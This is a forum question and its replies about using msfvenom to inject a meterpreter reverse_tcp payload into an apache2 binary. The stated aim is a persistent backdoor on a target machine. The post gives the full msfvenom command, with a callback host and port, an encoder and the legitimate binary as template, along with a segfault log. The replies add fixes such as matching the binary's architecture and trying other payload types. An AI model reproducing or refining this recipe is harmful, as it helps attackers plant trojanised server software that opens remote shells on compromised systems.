# Injecting meterpreter/reverse_tcp into apache2 with msfvenom results in seg fault of apache2

Tags: apache, metasploit, injection, backdoor

I've been trying to use msfvenom with the `linux/x86/meterpreter/reverse_tcp` payload and an apache2 binary. My intent is to create a tainted version of apache2 to establish a persistent backdoor on the target machine. Below is the general command I've been trying

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.181.218 LPORT=4444 -f elf -e x86/shikata_ga_nai -x ./apache2 -o ./apache2_hacked
```

I then copy the apache2_hacked binary to the proper location and attempt to start it with `service apache2 start`. This results in a seg fault.

```
root@kali:~# service apache2 start

Job for apache2.service failed. See 'systemctl status apache2.service' and 'journalctl -xn' for details.

root@kali:~# systemctl status apache2.service

● apache2.service - LSB: Apache2 web server

  Loaded: loaded (/etc/init.d/apache2)

  Active: failed (Result: exit-code) since Fri 2015-09-18 15:49:24 EDT; 3min 37s ago

 Process: 3446 ExecStart=/etc/init.d/apache2 start (code=exited, status=1/FAILURE)

Sep 18 15:49:24 kali apache2[3446]: Starting web server: apache2 failed!

Sep 18 15:49:24 kali apache2[3446]: The apache2 configtest failed. ... (warning).

Sep 18 15:49:24 kali apache2[3446]: Output of config test was:

Sep 18 15:49:24 kali apache2[3446]: Segmentation fault

Sep 18 15:49:24 kali apache2[3446]: Action 'configtest' failed.

Sep 18 15:49:24 kali apache2[3446]: The Apache error log may have more information.

Sep 18 15:49:24 kali systemd[1]: apache2.service: control process exited, code=exited status=1

Sep 18 15:49:24 kali systemd[1]: Failed to start LSB: Apache2 web server.

Sep 18 15:49:24 kali systemd[1]: Unit apache2.service entered failed state.
```

Am I using the tool correctly? Are there any restrictions on templates I need to be aware of? Is there some special about the apache2 binary that prevents injection attempts like this?

Comment: Is apache2 32-bit elf or 64-bit? Make sure it is 32-bit as well.

Comment: @void_in Thanks. I feel like I'm about to feel silly when I get a chance to check that on Monday

Answer (score -1):

Seems like the reference to segmentation refers to the 2 parts of the payload. Try staged and stageless variables, also cmd instead of meterpreter. I believe staged is one string and stageless is segmented. But im not sure i just started playing with msfvenom myzelf

Comment: I think you need to look up what "seg faults" are ...